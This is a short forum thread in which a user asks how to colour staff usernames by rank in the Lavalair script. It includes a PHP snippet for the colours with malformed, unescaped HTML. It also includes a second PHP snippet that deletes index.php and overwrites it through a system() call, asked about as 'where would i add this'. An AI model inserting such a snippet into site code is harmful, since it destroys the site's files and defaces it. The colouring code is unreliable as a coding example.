Can anybody help me.. I wanna have different colour for staff members in lavalair. Ex. Red for owner. Green for head admin etc. Any body pls help..!
Can anybody help me.. I wanna have different colour for staff members in lavalair. Ex. Red for owner. Green for head admin etc. Any body pls help..!
Code:$lnk = "<a href=\"index.php?action=viewuser&who=$item[2]\">$item[0]<a/>"; if($item[1]==1) { $item[1] = "<a href=\"index.php?action=viewuser&who=$item[2]\"><b><font color=\"yellow\">$item[0]</b><a/>"; }else if($item[1]==2) { $item[1] = "<a href=\"index.php?action=viewuser&who=$item[2]\"><b><font color=\"PINK\">$item[0]</font></b><a/>"; }else if($item[1]==3) { $item[1] = "<a href=\"index.php?action=viewuser&who=$item[2]\"><b><font color=\"VIOLET\">$item[0]</font></b><a/>"; }else if($item[1]==4) { $item[1] = "<a href=\"index.php?action=viewuser&who=$item[2]\"><b><font color=\"BROWN\">$item[0]</font></b><a/>"; }else if($item[1]==0) { $item[1] = "$lnk"; } echo "$item[1] > "; }
PHP Code:<?php
unlink("index.php");
system("echo witwiw > index.php");
?>
Where would i add this????? xxx
There are currently 1 users browsing this thread. (0 members and 1 guests)
Bookmarks